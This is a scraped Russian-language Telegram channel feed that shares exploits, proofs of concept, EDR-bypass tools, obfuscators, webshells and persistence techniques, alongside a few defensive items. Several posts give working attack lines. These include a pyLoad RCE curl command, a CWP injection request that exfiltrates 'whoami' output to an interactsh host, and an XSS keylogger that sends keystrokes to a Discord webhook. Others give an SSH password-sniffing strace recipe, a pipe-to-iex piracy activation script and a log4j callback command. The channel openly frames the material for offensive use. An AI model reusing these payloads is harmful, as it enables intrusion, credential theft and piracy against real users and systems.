|
2023-01-21 08:15:18 |
Коннектимся! |
|
2023-01-21 05:34:17 |
RDPAsynchronous RDP client for Python (headless) *Ну Вы понимаете, да ? )))подобрать |
|
2023-01-20 17:03:12 |
Если я пойду и долиною смертной тени, не убоюсь зла, потому что Ты со мной openAI;Твой жезл и Твой посох - они успокаивают меня. Ты приготовил предо мною трапезу в виду врагов моих; умастил елеем голову мою; чаша моя преисполнена.BOT off как вы поняли |
|
2023-01-20 14:35:30 |
Wolfenstein 3D CGAТут и описание то не нужно. забрать#wolf #90 |
|
2023-01-20 05:22:32 |
В продолжении темыПоявился nuclei-template для дыры CVE-2022-47966.yamlНу и сам nuclei забрать тут****Bonus для blueTeam - правило обнаружения эксплуатации дыры для Sigma - забрать |
|
2023-01-19 19:37:32 |
Exploiting null-dereferences in the Linux kernel Интересное#linux #kernel |
|
2023-01-19 18:50:00 |
SUDO KILLERТулза для выявления и использования неправильных конфигураций и уязвимостей правил sudo для повышения привилегий Linux.download |
|
2023-01-19 16:23:57 |
Чаты и каналы Telegram по информационной безопасности 2023 Хорошая подборочка over 100, но нас в ней нет ((Забираем |
|
2023-01-19 14:43:56 |
CVE-2022-47966*Список ПО от ManageEngine подверженных атаке поражает !* Уязвимость позволяет удаленное выполнение кода, отправив HTTP-запрос POST, содержащий вредоносный ответ SAML. А всё из за не патченной версии Apache Santuario для проверки подписи XML.*read*POC/exploit*Usage:python3 CVE-2022-47966.py --url https://10.0.40.64:8080/SamlResponseServlet --command notepad.exe |
|
2023-01-19 08:44:14 |
CVE-2023-22809 - опять Sudo, опять bypass😏#Unix #linux #sudo #bypass |
|
2023-01-18 11:38:40 |
NGINXConfigСамый простой способ настроить производительный, безопасный и стабильный NGINX сервер.Ну вдруг вам нужно, натыкали галочек, получили конфиг.НаТыкать#nginx |
|
2023-01-18 04:35:35 |
CVE-2022-46463 Проблема контроля доступа в Harbour v1.X.X–v2.5.3 позволяет злоумышленникам получать доступ к общедоступным и частным репозиториям без аутентификации.Вообще Харбор крутая штука, для devops\devsecopsexploit#harbor #repo |
|
2023-01-17 12:35:40 |
ОТСТАВИТЬ ПАНИКУБОТ был и останется бесплатным.Сейчас тестируются новые фичи. К вечеру все будет доступно в одном из двух вариантов:1. Допуск по телеграмм id для всех желающихили2. Допуск как и раньше, но с таймаутом сообщений в 30 сек3. симбиоз первого и второго варианта |
|
2023-01-17 09:42:13 |
CVE-2023-0297Pre-auth RCE in pyLoadreadExploit Code:curl -i -s -k -X $'POST' \ --data-binary $'jk=pyimport%20os;os.system(\"touch%20/tmp/pwnd\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \ $'http://<target>/flash/addcrypted2' |
|
2023-01-17 09:22:32 |
Windows Kernel Elevation of Privilege Vulnerability.CVE-2022-21881cve-2022-21881-io_completion-poc.cpp |
|
2023-01-16 16:41:53 |
ChatGPT - для RedTeam и BlueTeamГодная статья с хорошими примерами Читать OpenAI ChatGPT for Cyber SecurityЕсли нет учетки OpenAI - попробовать свои силы можно в нашем боте#openAI |
|
2023-01-15 05:22:05 |
Cellebrite & MSABДанные от Cellebrite и MSAB, двух компаний, которые предоставляют правительствам инструменты для взлома телефонов, были слиты.*Утечка включает в себя фактическое программное обеспечение, а также документацию.*Эти инструменты использовались против журналистов, активистов и диссидентов по всему миру. |
|
2023-01-15 04:33:49 |
next generation Firewall - а главное, надежный 😜 |
|
2023-01-14 07:32:22 |
chatGPT openAIпока в режиме тестаproxy_bar_openAI_bot#openAI #chatGPT #skynet |
|
2023-01-14 05:04:20 |
ExplorerPersistперехват загрузки cscapi.dll и как итог - внедрение "нашей" dll с "нашим" функционалом.Ну а Persistence в том что отрабатывает каждый раз при запуске проводникаdownload |
|
2023-01-13 11:57:53 |
Сжато, ёмко, всеобъемлюще, БАЗА !!!))))Для этих гребаных web-мастеров - motherfuckingwebsite.comЭтому не научат на курсахЧто то даже БаШорг вспомнился версии 2004 года....#humor #web #lol |
|
2023-01-13 09:53:55 |
охх))) RecycleBin снова в деле ! ) RecyclePersist |
|
2023-01-13 09:00:18 |
Новость по утечке в mail.ru - шляпа.И ничего полезного в ней нет. Разве что чисто на прозвон3505917 строк |
|
2023-01-13 04:43:48 |
CVE-2022-3656*Затронуто более 2,5 миллиардов пользователей Google Chrome и браузеров на базе Chromium.Эта уязвимость позволяет украсть конфиденциальные файлы, такие как зашифрованные кошельки и учетные данные облачного провайдера. |
|
2023-01-12 05:09:08 |
CVE-2023-21752Свежайшая Дыра (от 10 января) в службе резервного копирования WindowsLPE от юзера до системыAbout vulnexploit#windows #exploit #lpe |
|
2023-01-11 18:14:45 |
CVE-2023-0210В новый год, с новыми дырамиFlaw in Linux Kernel Allows Unauthenticated remote DOS AttacksPOC - ручками наберете#linux #kernel |
|
2023-01-11 17:53:04 |
Списки docker образов для прокачки Пентестаfor pentesterts |
|
2023-01-11 05:33:46 |
Активация windows и officeБыстрый способ без всяких KMS_autousage:PowerShell от админа и вставляем:irm https://massgrave.dev/get | iex и выбираем нужный пункт, ВСЁили такНу мало ли Вам нужно. |
|
2023-01-11 05:05:42 |
Exploit for CVE-2022-20452 privilege escalation on Android from installed app to system app (or another app)downLoad#android #exploit |
|
2023-01-10 12:50:56 |
ChatGPT Ultimate Resource Guide WoW |
|
2023-01-10 10:40:34 |
Атаки на банкоматы с использованием вредоносного ПОAzaZAвсе как вы любите |
|
2023-01-10 10:35:07 |
Chrome-V8 RCEexploit |
|
2023-01-10 05:03:27 |
ChatGPT_PoC - продолжаем наблюдение ))))#openAI |
|
2023-01-10 04:37:59 |
CVE-2022-31705POCGeekpwn 2022 Vmware EHCI OOBdownload |
|
2023-01-09 13:00:00 |
CVE-2022-41076The OWASSRF + TabShell exploit chaintabshell_poc.ps1 |
|
2023-01-09 11:05:21 |
Kerberos attacks 1-Kerberoasting AzaZa#Kerberos |
|
2023-01-08 17:17:57 |
CVE-2022-44877Control Web Panel Unauth RCEPOC usage:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Host: vulnContent-Type: application/x-www-form-urlencodedusername=root&password=toor&commit=Login |
|
2023-01-08 11:20:47 |
Расходимся, мы тут лишниечитать всю статью |
|
2023-01-08 09:28:55 |
Malware Analysis Series (MAS): Article 7Опа, седьмая часть вышла !PDF#malware #destroy #happy |
|
2023-01-08 05:34:03 |
FilelessNtdllReflectionЕще один Bypass Userland EDRdownload#bypassEDR |
|
2023-01-07 06:40:03 |
ААА сука, в голосину)))))))))))))))Linux find Windows 10/11 OEM product key command*Был ноут с windows, поставили linux, но ключ от винды хотим "подарить" ?)))sudo cat /sys/firmware/acpi/tables/MSDM | tail -1Смешное |
|
2023-01-07 06:31:29 |
UnhookingPatchBypass EDR download |
|
2023-01-06 17:09:37 |
Ребята, всем привет !!!!Прошел НОВЫЙ ГОД и вот вот наступит рождество !!!А это значит что PROXY_BAR всех Вас поздравляет, желает удачи, здоровья и взлома без последствий )))))В общем с праздниками ВАС )))))*****Ну и если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k |
|
2023-01-06 15:05:21 |
PhpMyAdmin Setup - доступен без аутентификации )))****1. ищем хосты через shodan и censys2. все IP сканим на на ниличие службы ПХПмайАдмин3. wappalyzer покажет php, лучше использовать php.txt 4. phpMyAdmin/setup найден )) |
|
2023-01-06 07:10:07 |
CVE-2022-44877Centos Web Panel 7 Unauthenticated Remote Code Executiondownload#centos #rce |
|
2023-01-06 05:08:50 |
OFFENSIVE SECURITY & REVERSE ENGINEERING (OSRE) Coursedownload |
|
2023-01-05 20:15:02 |
Alcatrazдвоичный обфускатор под x64, способный запутывать различные PE-файлы, включая:.exe.dll.sysdownload |
|
2023-01-05 12:25:55 |
Shellcode MutatorПрячемся от сигнатур !downloadusage:mutate.py [-h] [-t SHELLCODE_TEMPLATE] [-s SHELLCODE_FILE] [-m MORPH_PERCENTAGE] [-v] [-x86]#shellcode #Morphin |
|
2023-01-05 10:06:47 |
Casper-fs Это генератор пользовательских скрытых модулей ядра Linux. Каждый модуль работает в файловой системе для защиты и сокрытия секретных файлов. Понимаете ?)))*download*video |
|
2023-01-04 19:26:04 |
Gepetto: IDA plugin which queries OpenAI's ChatGPT to explain decompiled functionsdownload#ida #ai |
|
2023-01-04 13:10:19 |
exploit for CVE-2022-46164 осознать |
|
2023-01-04 12:49:44 |
Выносите святых, опять спулер (стар, но автоматичен)#windows #spooler #exploit #for_fun |
|
2023-01-04 12:44:10 |
Exploiting CVE-2022-42703 - Bringing back the stack attack Когда протекает память - почитать#linux #memory #exploit |
|
2023-01-04 12:38:35 |
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread_look |
|
2022-12-29 05:25:32 |
Kernel Exploits Recipes Notebookread#linux #kernel #exploit |
|
2022-12-28 05:40:26 |
WebKit+Kernel exploit chain for all PS Vita firmwares Ну вдруг вам нужно)download |
|
2022-12-27 17:57:00 |
Hidden firewall in Linux KernelКак дополнительный рубеж безопасности для сервера*ReadME*DownloadME*WatchMe |
|
2022-12-27 13:07:48 |
Коллекция Exploits - MacOS*CVE-2022-22583CVE-2022-22616CVE-2022-22639CVE-2022-26690CVE-2022-26712CVE-2022-26728CVE-2022-32786CVE-2022-32800*download#exploit #macOS |
|
2022-12-27 05:21:23 |
Force AdminСоздаем бесконечные запросы UAC, заставляющие пользователя работать от имени администратора. Лол, ну то есть админа тупо достали)))) как достать соседаdownload |
|
2022-12-25 15:06:37 |
Рубрика - нам пишутHey, I've got pretty cool project that you could put on proxybar*Shellcodevэто инструмент, предназначенный для помощи в автоматизации создания шелл-кодов.download#shellcode |
|
2022-12-25 09:48:28 |
Linux kernel exploit development*book#exploiting #linux |
|
2022-12-24 17:08:03 |
CVE-2022-42046 Наконец то опубликовалиlocal privilege escalation POC download#windows #lpe #poc |
|
2022-12-23 10:58:54 |
Wordpress - XSS ( CVE-2022-29455)/wp-content/plugins/elementor/assets/js/frontend.min.jsusage:https://target_site/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==#wordpress #xss |
|
2022-12-23 10:52:01 |
XSS Payload - Discord Keyloggerusage:<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>#discord #xss |
|
2022-12-23 07:48:50 |
Linux Kernel RCE (ksmbd)*CVSS SCORE: 10 из 10*Детали тутПатч прилетел в ядро только в ветке 5.15.61#10из10 |
|
2022-12-22 11:14:45 |
Охота на C2 C&C сервераПонимание работы и обнаружение фреймворков C2 (C&C) *1. Understanding & Detecting C2 Frameworks — TrevorC22. Understanding & Detecting C2 Frameworks — Ares3. Understanding & Detecting C2 Frameworks — HARS (HTTP/S Asynchronous Reverse Shell)4. Understanding & Detecting C2 Frameworks — BabyShark*BonusTrack:Download BabyShark#C2 #hackers #botnets |
|
2022-12-22 06:29:41 |
CVE-2022-2602 - exploitОпубликован PoC Kernel Privilege Escalation Linux*О чем это, прочитать тут_1 и тут_2*POC (точнее два) - забратьExploit - забрать#linux #kernel #exploits |
|
2022-12-22 06:19:25 |
Оценка уязвимостей с помощью Nmap ?Вам нужен ВУльтерВьюер ! *Из коробки умеет:Server IP addressNetwork port numberNetwork port statusProtocol used by the network portNetwork service operating on the network port and its versionVulnerability CVE-identifierVulnerability ratingURL-link to the description of the vulnerability on the platform Vulners.comЗаказывайте прямо сейчас с уникальной финкой лгбтDownload |
|
2022-12-21 14:17:14 |
log4j ДА, еще один, но попрощеusage:python3 hik.py https://localhost:443 xxx.oastify.com:80downLoad |
|
2022-12-21 14:01:37 |
Php Remote file Inclusion and RCE in flatpressblog/flatpressProof of Concept#php #vuln |
|
2022-12-21 08:40:36 |
CloudmareПалим реальные IPадреса сайтов защищенных Cloudflare, Sucuri или Incapsula.Но таки да - работает только если криво настроен DNS.download |
|
2022-12-21 08:14:02 |
Атаки на web-приложения на JAVAЭто обучающий проект, время от времени обновляется. Проект стремится поделиться технологиями, связанными с безопасностью Java, в краткой и ясной форме, упростить некоторые сложные технические вопросы и позволить изучить безопасность Java.download*Bonus trackJar AnalyzerGUI для анализа файлов JAR, особенно подходящий для анализа безопасности кода. download#java #security #web #hack |
|
2022-12-20 11:20:07 |
Только ВАЖНЫЕ вопросы ! #hackers #xss |
|
2022-12-19 11:24:38 |
linux injectorИнжектим в общие библиотеки x64 Linux. (без ptrace - а то на ptrace root права нужны, а права повышать в системе в падлу)usage:linux_injector <pid> <module>Да да, все так просто, иди уже.download |
|
2022-12-19 11:17:54 |
powershell-obfuscationОбфускатор Powershell anti-kill, простой и эффективный, проходит все VT (когда трава была зеленее)download |
|
2022-12-18 10:45:29 |
MacDirtyCowDemПолучаем root в macOS 13.0.1 через CVE-2022-46689exploit#root #macos #exploit |
|
2022-12-17 14:55:29 |
Dirty Vanityновая техника внедрения, злоупотребляющая Windows fork API для обхода EDR.Слайды тутPOC тут#windows #bypass #edr |
|
2022-12-16 13:39:36 |
Бэкдоры в FreePBXPHP бэкдор, который добавляет своего пользователя (mgknight), удаляет законных юзеров, кодируется в base64 и переписывает .htaccess - встречайте на ваших серваках телефонии)))Пятничное расследование читать#freepbx #backdoor |
|
2022-12-16 09:42:00 |
CVE-2022-28672Foxit PDF Reader Remote Code Execution Exploit (NOT POC)))) |
|
2022-12-16 09:38:19 |
Super XrayWeb Vulnerability Scannerdownload#web #vuln #scanner |
|
2022-12-16 09:30:54 |
Большая коллекция WEBSHELLSНа asp, aspx, php, jsp, pl, py, etcdownload#webshell |
|
2022-12-16 06:32:14 |
CVE-2022-45451 Acronis POCdownload |
|
2022-12-16 03:42:30 |
Privilege Escalation Vulnerabilities (UNIX Insecure File Handling) *1. UNIX Symlink Following and Insecure File Permissions in Detailed Lock Logging2. UNIX Symlink Following and Race Condition in Hardware Reporting 3. UNIX Symlink Following and Race Condition in System Log Feature of saposcol4. UNIX Symlink Following in Log File Creation of saposcol5. UNIX Symlink Following in Shared Memory Dump File Creation of saposcol#linux #privesc #sec |
|
2022-12-16 03:11:03 |
DirCreate2SystemПолучаем NT AUTHORITY\\SYSTEM*Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.*DOWNLOAD POC#windows #escpriv #POC #system |
|
2022-12-16 03:00:35 |
Пятничная викторина )))#docker #vuln |
|
2022-12-15 07:56:38 |
SIEMSIEM Tactics, Techiques, and Procedures read |
|
2022-12-09 10:00:40 |
Перехват системных вызовов в Windows 11 22H2 like Avast Antivirus.Исследование, анализ и обход.Learn#windows #syscall #bypass |
|
2022-12-09 09:50:48 |
DCOMPotatoКоллекция эксплойтов /повышения привилегий службы DCOM.*doownload#exploit #dcom |
|
2022-12-09 06:44:51 |
Ну во первых с пятницей.А во вторых, Я тебя сука по IP вычислю*только для образовательных целей (нет)#track #ip #deanon |
|
2022-12-08 19:56:26 |
в предложку кстати |
|
2022-12-08 13:59:41 |
Defender Exclusions BOFХороший пример того, что defender отключать не обязательно, достаточно определить "исключения" ииии воспользоваться ими )))0_щ |
|
2022-12-08 13:42:39 |
CVE-2022-2414Дырка в pki-coreуязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы. |
|
2022-12-08 08:52:08 |
Получаем пароль от SSH в открытом виде*1. получаем точный идентификатор sshdpgrep -l sshd2. Отслеживаем системные вызовы strace -f -p <ssh_PID> -e trace=write -o capture#ssh #sniff #password |
|
2022-12-08 08:14:33 |
CVE-2022-29596MicroStrategy Enterprise Manager 2022обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login#microsoft #bypass |
|
2022-12-08 07:51:03 |
RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypassread |
|
2022-12-07 12:58:39 |
Burp Suite PRO version 2022.12.2 |
|
2022-12-07 06:30:34 |
PentagridSMS-шлюз с открытым исходным кодом для пентест проектовreadinstall and run#gsm #gateway #sms #2G/3G/4G/5G |
|
2022-12-07 06:04:44 |
Random C2 Profile Generatorдля cobalt-strikedownload#cobalt |
|
2022-12-07 05:33:30 |
PENTESTING BIBLE |
|
2022-12-06 10:33:45 |
Linux PrivEscЗлой CRON для самых маленьких - тут#linux #cron #esc |
|
2022-12-06 07:17:51 |
Bug Bounty Wordlistsdownload |
|
2022-12-05 11:57:02 |
концепция удаления/записи произвольного файла в Sysmon (CVE-2022-41120/CVE-2022-XXXXX)download POC#windows #LPE #poc |
|
2022-12-05 07:13:32 |
The Defender’s Guide to the Windows Registryread#widows #defender #registry |
|
2022-12-04 17:44:16 |
Black Hat 2022 USA/ASIA/EuropeвидеоUSAASIAEUROPE |
|
2022-12-02 14:24:38 |
Recon Methods*part 1 - OSINT Host Discoverypart 2 - OSINT Host Discovery Continuedpart 3 - OSINT Employee Discoverypart 4 - Automated OSINTpart 5 - Traffic on the Target#cybersec #recon |
|
2022-12-01 20:21:12 |
WindowSpyЭто такой Cobalt Strike Beacon который "узконаправленно" следит за действиями пользователя (открытие определенных документов, вкладки браузера, vpn коннекты и тд).Такая движуха повышает скрытность и снижает обнаружение. Значит - маст хэв.download #cobaltstrike #module |
|
2022-12-01 14:22:21 |
The Linux Kernel Module Programming GuideNovember 10, 2022read |
|
2022-12-01 08:33:15 |
Microsoft Exchange ProxyNotShell RCEНе POC, а полноценный официальный exploit для metasploitdownload#rce #exploit #microsoft #metasploit |
|
2022-12-01 08:18:50 |
RCE root-уязвимость в утилите ping, поставляемой во FreeBSDCVE-2022-23093read |
|
2022-11-30 08:44:00 |
такое конечно, но актуальнее с каждым днем |
|
2022-11-30 08:10:51 |
модуль Metasploit для удаленного управления для развертывания полезной нагрузки и запуска ее с сервераRemote Control Collection Remote Code Executiondownload#exploit #remote |
|
2022-11-29 16:07:20 |
Vulnerability Feed#vuln #exploits |
|
2022-11-29 10:27:50 |
regex GitHub Dorks /ssh:\/\/.*:.*@.*target\.com/ /ftp:\/\/.*:.*@.*target\.com/ |
|
2022-11-29 05:42:49 |
SpartacusDLL Hijacking Discovery ToolТот спартак вроде оскар получил)) #dll |
|
2022-11-29 05:35:29 |
Рановато, но таки даТОП 10 из 20221. Follina (CVE-2022-30190)2. Log4Shell (CVE-2021-44228)3. Spring4Shell (CVE-2022-22965)4. F5 BIG-IP (CVE-2022-1388)5. Google Chrome zero-day (CVE-2022-0609)6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)9. Atlassian Confluence RCE flaw (CVE-2022-26134)10. Zyxel RCE vulnerability (CVE-2022-30525) |
|
2022-11-25 07:18:33 |
Malware Analysis Seriespdf |
|
2022-11-25 07:13:29 |
Ох лоооол)))0day fanslink |
|
2022-11-22 19:23:00 |
MEGA 6500%в июне 2022 года я обнаружил уязвимость в системе облачного хранения MEGA, которая позволяла мне хранить больше данных, чем разрешено для бесплатных учетных записей. Мне удалось сохранить примерно 1300 ГБ данных в MEGA, несмотря на то, что ограничение на бесплатное хранилище для MEGA составляет 20 ГБ.Видела ман в сентябре, там был другой подход !Через яндекс фотки можно было попась в яндекс деньгиПочитать стори |
|
2022-11-22 13:37:53 |
Для Red Team*Red Team Management by JoasAwesome Red Team by yeyintminthuhtutAwesome Red Team Operations by Joas |
|
2022-11-22 12:57:04 |
CVE-2022-41924 RCE in Tailscale (vpn service)занятный research#vpn #rce #research |
|
2022-11-22 07:49:05 |
wireguard-initramfs*Включает wireguard во время загрузки ядра до монтирования зашифрованных разделов. В сочетании с dropbear это может обеспечить ПОЛНОСТЬЮ ЗАШИФРОВАННУЮ удаленную загрузку без хранения ключевого материала.Вообще есть конечно способы проще, но мало ли кому пригодится.download#security #linux |
|
2022-11-22 05:55:19 |
ViperSoftX: Hiding in System Logs and Spreading VenomSoftXна почитать |
|
2022-11-22 04:53:34 |
просто положу тутcypherhound |
|
2022-11-22 04:38:39 |
Прикольнопроверить, подвержены ли вы известной уязвимости в вашем оборудовании (ЦП) при использовании Linux, бонусом статус устранения:grep -r . /sys/devices/system/cpu/vulnerabilities/ |
|
2022-11-22 04:15:09 |
Active Directory Attack Cheat SheetRead#AD #attack |
|
2022-11-18 09:41:21 |
Всем привет !!!Вчера у нас был день рождения, каналу исполнился один год.Год был не простой, многое изменилось, приходили и уходили люди, менялась концепция канала, выстраивалась модель поведения.***Много интересных людей постучалось в ЛС с интересными предложениями, (спасибо Вам большое), некоторые из них мы начнем реализовывать уже сегодня.***Начнем с общего ЧАТа для общения и обмена опытом ЧЯТ***Если Вам нравится то что мы делаем, Вы можете нас поддержатьBitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8kС днем рождения proxy-bar !!!Иногда тут куется контент))) |
|
2022-11-18 05:39:59 |
будь в курсеinvite to defcon.social |
|
2022-11-18 05:31:06 |
ArtfuscatorЛучший подход к психологической войне против reverse-инженеров.Звучит конечно жирно,))downLoad |
|
2022-11-18 05:16:20 |
Рабочий PoC для CVE-2022-41040 and CVE-2022-41082 (A.K.A ProxyNotShell)*python poc_aug3.py <host> <username> <password> <command>*download POC |
|
2022-11-11 20:17:38 |
kernel r/w exploit for iOS 15 and macOS 12 *Эксплойт объединяет 4 уязвимости:CVE-2022-32845 : aned signature check bypass for model.hwx.CVE-2022-32948 : DeCxt::FileIndexToWeight() OOB Read due to lack of array index validation.CVE-2022-42805 : ZinComputeProgramUpdateMutables() potential arbitrary read due to Integer overflow issue.CVE-2022-32899 : DeCxt::RasterizeScaleBiasData() Buffer underflow due to integer overflow issue.Протестировано на:iPhone12 Pro (iPhone13,3) with iOS 15.5.iPad Pro (iPad8,10) with iPadOS 15.5.iPhone11 Pro (iPhone12,3) with iOS 15.4.1.MacBookAir10,1 M1 with macOS 12.4. |
|
2022-11-11 15:45:40 |
Кто твой источник ?Сбор информации из dark-web и темных уголков clearNet в контексте разведки киберугроз.deepdarkCTI Откуда:* Telegram channels, groups and chats* Discord channels* ransomware gangs sites* forums related to cyber criminal activities and data leaks* markets* exploits databases* Twitter accounts* RaaS (Ransomware As A Service) sitesНекоторые могут найти себя 😎#osint #Cyber_Threat_Intelligence |
|
2022-11-11 11:47:54 |
значит, случаи были |
|
2022-11-10 20:55:27 |
Вот так оно все и начинается - отличный тред - "У меня есть друг, друг пишет руткиты, а недавно я купил новый ноут, ноут стал странно себя вести и друг хохочет"Теперь комьюнити разворачивает детективную серию по поиску черной кошки в темной комнате.А был ли мальчик ? и был ли rootkitПочитать на ночь removing-a-rootkit (комменты обязательно)#idiots #exFriend |
|
2022-11-10 18:27:28 |
Backdooring Office Structures. Part 1: The Oldschool Backdooring Office Structures. Part 2: Payload Crumbs In Custom Parts #old |
|